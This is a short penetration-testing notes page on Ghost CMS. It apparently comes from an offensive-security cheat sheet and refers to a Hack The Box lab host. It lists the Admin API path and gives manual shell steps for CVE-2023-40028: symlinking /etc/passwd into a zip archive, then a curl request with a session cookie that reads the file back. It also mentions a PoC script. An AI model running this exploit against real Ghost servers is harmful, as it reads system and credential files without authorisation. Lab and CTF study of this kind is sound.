Ghost CMS

Open source content management system platform written in JavaScrip

Enumeration
base URL for the Admin API
/ghost/api/admin
CVE-2023-40028 - Arbitrary File Read

Vulnerable version prior to 5.59.1

The vulnerability allows authenticated users to upload symlinks that will allow attackers to access files outside of content/

Manual Exploit

mkdir -p exploit/content/images/
Create the symbolic link
ln -s /etc/passwd exploit/content/images/test-file.png
-y tells zip to include symbolic links
zip -r -y exploit.zip exploit/
Upload the file
curl -b 'ghost-admin-api-session=s%3AbWhDHjQNa5JeU809QF2JPW6e4UEss2Em.g6N0Kedu5O7xKtx8RF30BBpoEO1OMgdIJ%2BazK7H6nWY' http://linkvortex.htb/content/images/test-file.png

POC

Link

Make sure to modify GHOST_URL value before using it

Read files
./CVE-2023-40028.sh -u username -p password
PreviousNeo4jNextBackDrop CMS

Last updated